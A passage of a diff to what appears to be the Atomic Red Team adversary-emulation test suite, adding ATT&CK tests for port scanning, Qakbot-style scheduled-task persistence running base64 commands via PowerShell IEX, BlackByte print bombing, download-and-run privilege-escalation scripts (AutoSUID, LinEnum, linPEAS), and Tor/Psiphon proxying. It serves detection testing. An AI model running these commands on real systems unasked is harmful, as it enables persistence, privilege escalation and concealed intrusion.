-        (which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
+        (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
   executor:
     command: |
       sudo tcpdump -c 5 -nnni #{interface}    

atomics/T1046/T1046.md

@@ -72,7 +72,7 @@ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a sin
 | network_range | Network Range to Scan. | String | 192.168.1.0/24|
 
 
-#### Attack Commands: Run with `sh`! 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
 
 
 ```sh
@@ -92,7 +92,25 @@ if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
-(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
+(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
+```
+##### Description: Check if nc command exists on the machine
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)
+```
+##### Description: Check if telnet command exists on the machine
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
 ```
 
 

atomics/T1046/T1046.yaml

@@ -46,13 +46,26 @@ atomic_tests:
     prereq_command: |
       if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
-      (which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
+      (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
+  - description: |
+      Check if nc command exists on the machine
+    prereq_command: |
+      if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      (which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)
+  - description: |
+      Check if telnet command exists on the machine
+    prereq_command: |
+      if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      (which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
   executor:
     command: |
       nmap -sS #{network_range} -p #{port}
       telnet #{host} #{port}
       nc -nv #{host} #{port}
     name: sh
+    elevation_required: true
 - name: Port Scan NMap for Windows
   auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
   description: Scan ports to check for listening ports for the local host 127.0.0.1

atomics/T1053.005/T1053.005.md

@@ -20,6 +20,8 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
 
 - [Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task](#atomic-test-6---wmi-invoke-cimmethod-scheduled-task)
 
+- [Atomic Test #7 - Scheduled Task Executing Base64 Encoded Commands From Registry](#atomic-test-7---scheduled-task-executing-base64-encoded-commands-from-registry)
+
 
 <br/>
 
@@ -261,4 +263,47 @@ Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - Scheduled Task Executing Base64 Encoded Commands From Registry
+A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.
+The scheduled task will launch powershell to decode and run the command in the rgistry daily.
+This is a persistence mechanism recently seen in use by Qakbot.  
+
+[Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e895677d-4f06-49ab-91b6-ae3742d0a2ba
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| time | Daily scheduled task execution time | string | 27900|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
+schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
+```
+
+#### Cleanup Commands:
+```cmd
+schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
+reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
+```
+
+
+
+
+
 <br/>

atomics/T1053.005/T1053.005.yaml

@@ -141,3 +141,26 @@ atomic_tests:
       Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
     cleanup_command: |
       Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1
+- name: Scheduled Task Executing Base64 Encoded Commands From Registry
+  auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
+  description: |
+    A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.
+    The scheduled task will launch powershell to decode and run the command in the rgistry daily.
+    This is a persistence mechanism recently seen in use by Qakbot.  
+    
+    [Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    time:
+      description: Daily scheduled task execution time
+      type: string
+      default: 07:45
+  executor:
+    command: |
+      reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
+      schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
+    cleanup_command: |
+      schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
+      reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
+    name: command_prompt

atomics/T1059.003/T1059.003.md

@@ -14,6 +14,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
 
 - [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell)
 
+- [Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing](#atomic-test-4---simulate-blackbyte-ransomware-print-bombing)
+
 
 <br/>
 
@@ -137,4 +139,56 @@ Command line executed via suspicious invocation. Example is from the 2021 Threat
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing
+This test attempts to open a file a specified number of times in Wordpad, then prints the contents. 
+It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
+See https://redcanary.com/blog/blackbyte-ransomware/.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_print | File to be opened/printed by Wordpad. | String | $env:temp&#92;T1059_003note.txt|
+| max_to_print | The maximum number of Wordpad windows the test will open/print. | String | 75|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
+```
+
+#### Cleanup Commands:
+```powershell
+stop-process -name wordpad -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: File to print must exist on disk at specified location (#{file_to_print})
+##### Check Prereq Commands:
+```powershell
+if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null
+```
+
+
+
+
 <br/>

atomics/T1059.003/T1059.003.yaml

@@ -71,3 +71,34 @@ atomic_tests:
     command: |
       %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
     name: command_prompt
+- name: Simulate BlackByte Ransomware Print Bombing
+  auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+  description: |
+    This test attempts to open a file a specified number of times in Wordpad, then prints the contents. 
+    It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
+    See https://redcanary.com/blog/blackbyte-ransomware/. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    file_to_print:
+      description: File to be opened/printed by Wordpad.
+      type: String
+      default: $env:temp\T1059_003note.txt
+    max_to_print:
+      description: The maximum number of Wordpad windows the test will open/print.
+      type: String
+      default: 75
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      File to print must exist on disk at specified location (#{file_to_print})
+    prereq_command: |
+      if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+    get_prereq_command: |
+      new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null
+  executor:
+    command: |
+      cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
+    cleanup_command: |
+      stop-process -name wordpad -force -erroraction silentlycontinue
+    name: powershell

atomics/T1059.004/T1059.004.md

@@ -12,6 +12,10 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
 
 - [Atomic Test #2 - Command-Line Interface](#atomic-test-2---command-line-interface)
 
+- [Atomic Test #3 - Harvest SUID executable files](#atomic-test-3---harvest-suid-executable-files)
+
+- [Atomic Test #4 - LinEnum tool execution](#atomic-test-4---linenum-tool-execution)
+
 
 <br/>
 
@@ -87,4 +91,98 @@ rm /tmp/art-fish.txt
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Harvest SUID executable files
+AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 46274fc6-08a7-4956-861b-24cbbaa0503c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| autosuid | Path to the autosuid shell script | Path | PathToAtomicsFolder/T1059.004/src/AutoSUID.sh|
+| autosuid_url | Path to download autosuid shell script | Url | https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+chmod +x #{autosuid}
+bash #{autosuid}
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: AutoSUID must exist on disk at specified location (#{autosuid})
+##### Check Prereq Commands:
+```bash
+if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+curl #{autosuid_url} --output #{autosuid}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - LinEnum tool execution
+LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a2b35a63-9df1-4806-9a4d-5fe0500845f2
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| linenum | Path to the LinEnum shell script | Path | PathToAtomicsFolder/T1059.004/src/LinEnum.sh|
+| linenum_url | Path to download LinEnum shell script | Url | https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+chmod +x #{linenum}
+bash #{linenum}
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: LinnEnum must exist on disk at specified location (#{linenum})
+##### Check Prereq Commands:
+```bash
+if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+curl #{linenum_url} --output #{linenum}
+```
+
+
+
+
 <br/>

atomics/T1059.004/T1059.004.yaml

@@ -38,3 +38,60 @@ atomic_tests:
     cleanup_command: |
       rm /tmp/art-fish.txt
     name: sh
+- name: Harvest SUID executable files
+  auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c
+  description: |
+    AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. 
+  supported_platforms:
+  - linux 
+  input_arguments:
+    autosuid:
+      description: Path to the autosuid shell script
+      type: Path
+      default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
+    autosuid_url:
+      description: Path to download autosuid shell script
+      type: Url
+      default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      AutoSUID must exist on disk at specified location (#{autosuid})
+    prereq_command: |
+      if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      curl #{autosuid_url} --output #{autosuid}
+  executor:
+    command: |
+      chmod +x #{autosuid}
+      bash #{autosuid}
+    name: sh
+
+- name: LinEnum tool execution
+  auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
+  description: |
+    LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
+  supported_platforms:
+  - linux 
+  input_arguments:
+    linenum:
+      description: Path to the LinEnum shell script
+      type: Path
+      default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
+    linenum_url:
+      description: Path to download LinEnum shell script
+      type: Url
+      default: https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      LinnEnum must exist on disk at specified location (#{linenum})
+    prereq_command: |
+      if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      curl #{linenum_url} --output #{linenum}
+  executor:
+    command: |
+      chmod +x #{linenum}
+      bash #{linenum}
+    name: sh

atomics/T1059.005/T1059.005.md

@@ -46,7 +46,6 @@ cscript #{vbscript} > $env:TEMP\T1059.005.out.txt
 
 #### Cleanup Commands:
 ```powershell
-Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
 Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
 ```
 
@@ -60,9 +59,8 @@ if (Test-Path #{vbscript}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
 New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
 ```
 
 

atomics/T1059.005/T1059.005.yaml

@@ -19,13 +19,11 @@ atomic_tests:
   - description: Sample script must exist on disk at specified location (#{vbscript})
     prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1} '
     get_prereq_command: |-
-      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
       New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-      Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
   executor:
     command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
     cleanup_command: |-
-      Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
       Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
     name: powershell
 

atomics/T1059.006/T1059.006.md

@@ -30,7 +30,7 @@ Download and execute shell script and write to file then execute locally using P
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
+| script_url | Shell script public URL | String | https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh|
 | payload_file_name | Name of shell script downloaded from the script_url | String | T1059.006-payload|
 | executor | Linux shell | String | sh|
 | script_args | Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files. | String | -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles|
@@ -85,7 +85,7 @@ Create Python file (.py) that downloads and executes shell script via executor a
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | python_script_name | Python script name | Path | T1059.006.py|
-| script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
+| script_url | Shell script public URL | String | https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh|
 | payload_file_name | Shell script file name downloaded from the script_url | String | T1059.006-payload|
 | executor | Payload or script interpreter / executor | String | sh|
 | script_args | Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files | String | -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles|
@@ -150,7 +150,7 @@ Create Python file (.py) then compile to binary (.pyc) that downloads an externa
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | python_script_name | Name of Python script name | Path | T1059.006.py|
-| script_url | URL hosting external malicious payload | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
+| script_url | URL hosting external malicious payload | String | https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh|
 | payload_file_name | Shell script file name downloaded from the script_url | String | T1059.006-payload|
 | executor | Payload or script interpreter / executor | String | sh|
 | script_args | Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files | String | -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles|

atomics/T1059.006/T1059.006.yaml

@@ -10,7 +10,7 @@ atomic_tests:
       script_url: 
         description: Shell script public URL
         type: String
-        default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+        default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
       payload_file_name: 
         description: Name of shell script downloaded from the script_url
         type: String
@@ -51,7 +51,7 @@ atomic_tests:
       script_url: 
         description: Shell script public URL
         type: String
-        default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+        default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
       payload_file_name: 
         description: Shell script file name downloaded from the script_url
         type: String
@@ -104,7 +104,7 @@ atomic_tests:
       script_url: 
         description: URL hosting external malicious payload
         type: String
-        default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+        default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
       payload_file_name: 
         description: Shell script file name downloaded from the script_url
         type: String

atomics/T1087.001/T1087.001.md

@@ -166,6 +166,18 @@ username=$(id -u -n) && lsof -u $username
 
 
 
+#### Dependencies:  Run with `sh`!
+##### Description: check if lsof exists
+##### Check Prereq Commands:
+```sh
+which lsof
+```
+##### Get Prereq Commands:
+```sh
+(which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)
+```
+
+
 
 
 <br/>

atomics/T1087.001/T1087.001.yaml

@@ -69,6 +69,14 @@ atomic_tests:
     command: |
       username=$(id -u -n) && lsof -u $username
     name: sh
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      check if lsof exists
+    prereq_command: |
+      which lsof
+    get_prereq_command: |
+      (which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)
 - name: Show if a user account has ever logged in remotely
   auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
   description: |

atomics/T1090.003/T1090.003.md

@@ -0,0 +1,219 @@
+# T1090.003 - Multi-hop Proxy
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1090/003)
+<blockquote>To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
+
+In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Psiphon](#atomic-test-1---psiphon)
+
+- [Atomic Test #2 - Tor Proxy Usage - Windows](#atomic-test-2---tor-proxy-usage---windows)
+
+- [Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu](#atomic-test-3---tor-proxy-usage---debianubuntu)
+
+- [Atomic Test #4 - Tor Proxy Usage - MacOS](#atomic-test-4---tor-proxy-usage---macos)
+
+
+<br/>
+
+## Atomic Test #1 - Psiphon
+Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you
+with uncensored access to Internet.
+This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.
+More information can be found about Psiphon using the following urls
+http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
+https://psiphon.ca/faq.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 14d55ca0-920e-4b44-8425-37eedd72b173
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+PathToAtomicsFolder\T1090.003\src\Psiphon.bat
+```
+
+#### Cleanup Commands:
+```powershell
+$Proxy = Get-Content $env:Temp\proxy-backup.txt -ErrorAction Ignore
+if($null -ne $Proxy) 
+{Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -Value $Proxy}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
+##### Check Prereq Commands:
+```powershell
+if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+if(-not (test-path $env:Temp\proxy-backup.txt)){
+$Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
+Set-Content $env:Temp\proxy-backup.txt $Proxy}
+```
+##### Description: The Psiphon executable must exist in the Downloads folder
+##### Check Prereq Commands:
+```powershell
+if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Tor Proxy Usage - Windows
+This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
+Upon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7b9d85e5-c4ce-4434-8060-d3de83595e69
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| TorExe | Location of tor.exe file. | String | $env:temp&#92;tor&#92;Tor&#92;tor.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
+sleep -s 60
+stop-process -name "tor" | out-null
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: tor.exe must be installed on the machine
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{TorExe}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic
+expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu
+This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
+Upon successful execution, the tor proxy service will be launched.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+sudo systemctl start tor
+```
+
+#### Cleanup Commands:
+```sh
+sudo systemctl stop tor
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Tor must be installed on the machine
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install tor
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Tor Proxy Usage - MacOS
+This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
+Upon successful execution, the tor proxy service will be launched.
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 12631354-fdbc-4164-92be-402527e748da
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+osascript -e 'tell application "Terminal" to do script "tor"'
+```
+
+#### Cleanup Commands:
+```sh
+killall tor > /dev/null 2>&1
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Tor must be installed on the machine
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi
+brew install tor
+```
+
+
+
+
+<br/>

atomics/T1090.003/T1090.003.yaml

@@ -0,0 +1,110 @@
+attack_technique: T1090.003
+display_name: 'Proxy: Multi-hop Proxy'
+atomic_tests:
+- name: Psiphon
+  auto_generated_guid: 14d55ca0-920e-4b44-8425-37eedd72b173
+  description: |
+    Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you
+    with uncensored access to Internet.
+    This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.
+    More information can be found about Psiphon using the following urls
+    http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
+    https://psiphon.ca/faq.html
+  supported_platforms:
+    - windows
+  dependency_executor_name: powershell 
+  dependencies:
+    - description: |
+        The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
+      prereq_command: | 
+        if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
+      get_prereq_command: |
+        if(-not (test-path $env:Temp\proxy-backup.txt)){
+        $Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
+        Set-Content $env:Temp\proxy-backup.txt $Proxy}
+    - description: |
+        The Psiphon executable must exist in the Downloads folder
+      prereq_command: | 
+        if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
+      get_prereq_command: |
+        Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
+  executor:
+    name: powershell
+    command: |
+      PathToAtomicsFolder\T1090.003\src\Psiphon.bat
+    cleanup_command: |
+      $Proxy = Get-Content $env:Temp\proxy-backup.txt -ErrorAction Ignore
+      if($null -ne $Proxy) 
+      {Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -Value $Proxy}
+
+- name: Tor Proxy Usage - Windows
+  auto_generated_guid: 7b9d85e5-c4ce-4434-8060-d3de83595e69
+  description: |
+    This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
